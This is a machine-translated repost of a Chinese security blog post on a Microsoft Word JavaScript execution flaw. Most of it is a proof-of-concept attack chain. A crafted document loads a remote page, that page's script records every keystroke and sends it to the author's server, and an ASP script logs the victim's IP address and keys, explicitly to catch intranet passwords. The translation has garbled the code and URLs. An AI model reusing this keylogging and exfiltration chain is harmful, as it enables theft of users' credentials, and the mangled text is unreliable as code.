Some tests on MS word javascript execution

Source: Internet
Author: User

Author: cosine
Source: 0 × 37 Security

Microsoft word javascript execution Original: /? L = bugtraq & m = 121121432823704 & w = 2, discussed in the hi group. We can draw some conclusions:

1. Because the ActiveX inline data stream function is disabled after the Q313675 security patch is installed, it is not feasible to execute malicious codz by directly creating ActiveX objects using JS. The following code:

<OBJECT classid = clsid: AE24FDAE-03C6-11D1-8B76-0080C744F389> <param name = url value = "javascript: document. write (& lt; script src =;&lt;/script&gt;)"> </OBJECT>
This remote doc. js file has limited capabilities. However, the pop-up dialog box or a new window still works.

2. holes are actually found in xml files. When html constructed in the preceding way is opened in word and saved as xml, the data in the xml file is converted to xml format. However, the <w: ocx w: data = "......" />. This is where the problem occurs. The extension .doc,. rtf, And. xml will be opened in the word default mode. At this time, word acts as an interpreter, <w: ocx w: data = "......" /> The internal data is interpreted and executed, causing JS.

3. The AE24FDAE-03C6-11D1-8B76-0080C744F389 is the classid of mshtml. dll. It is still valuable to identify the cause of the vulnerability and fix the vulnerability.

Since this JS capability is limited, you can enjoy it, as mentioned here: http: // www.0 × 37. com/post/15.html. The following POC is carried out in this way: when the user opens the worddocument behind our malicious structure doc.doc, will pop up the internal network of the home page (take it to experiment, completely out of my inertia ......). Then we can record the user's key records on this page :). Maybe the password is caught directly. (if other users are the same as me, you can Enter the password directly on the Intranet and then Enter. This is a habit ......).

The doc.html code is as follows:

<OBJECT classid = clsid: AE24FDAE-03C6-11D1-8B76-0080C744F389> <param name = url value = "javascript: x = open (; setInterval (function () {try {x. frames [0]. location = {toString: function () {return % 20' http: // www.0 × 37. com/Project/poc/docshell.html ';}} catch (e) {}, 3000); void (1); "> </OBJECT>
Follow /? Lw.bugtraq&m=123791432823704&w=2the generated doc.doc file (this is the evil document. Change the name so that you can open it easily ).

The remote docshell.html code is as follows:

<Body bgcolor = "#333333" type = "codeph" text = "/codeph">
<Div id = "o"> </div>
<Input type = text id = "x" style = "width: 0; height: 0">
Var _ x = false;
If (window. XMLHttpRequest ){
_ X = new XMLHttpRequest ();
} Else if (window. ActiveXObject ){
_ X = new ActiveXObject ("Msxml2.XMLHTTP ");
If (! _ X) {_ x = new ActiveXObject ("Microsoft. XMLHTTP ");}
Document. onkeydown = function (e ){
If (! E) e = window. event;
Try {
Tmp = (String. fromCharCode (e. which | e. keyCode ));
_ 3or7 ("GET", "asp? Tmp = "+ tmp, null"> http: // www.0 × 37. com/Project/poc/docshell. asp? Tmp = "+ tmp, null );
} Catch (ex ){}
Function _ 3or7 (_ m, _ s, _ ){
_ X. open (_ m, _ s, false );
_ X. send (_ );
Return _ x. responseText;
SetInterval (function () {try {document. getElementById ('x). focus () ;}catch (e) {}, 100 );
Focus ();
The remote docshell. asp code is as follows:

Ip = Request. ServerVariables ("HTTP_X_FORWARDED_FOR ")
If ip = "" Then
Ip = Request. ServerVariables ("REMOTE_ADDR ")
End If
Tmp = Request. QueryString ("tmp ")
Response. write (tmp)
Filename = "docshell.txt"
Set fso = Server. CreateObject ("Scripting. FileSystemObject ")
Set file = fso. OpenTextFile (server. mappath (filename), 8, true)
File. write (ip + ">" + tmp + chr (13 ))
File. close
Set file = nothing
Set fso = nothing
Then we can see the record result on the http: // www.0 × 37. com/Project/poc/docshell.txt :). Complete file: http: // www.0 × 37. com/Project/poc/wordjs.rar. However, this keyboard record is still flawed. I wanted to combine the http: // www.0 × 37. com/post/15.html method to construct more evil code, but it was not smooth ...... Then I will talk about it later :). Now let's wait for more information about the vulnerability.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.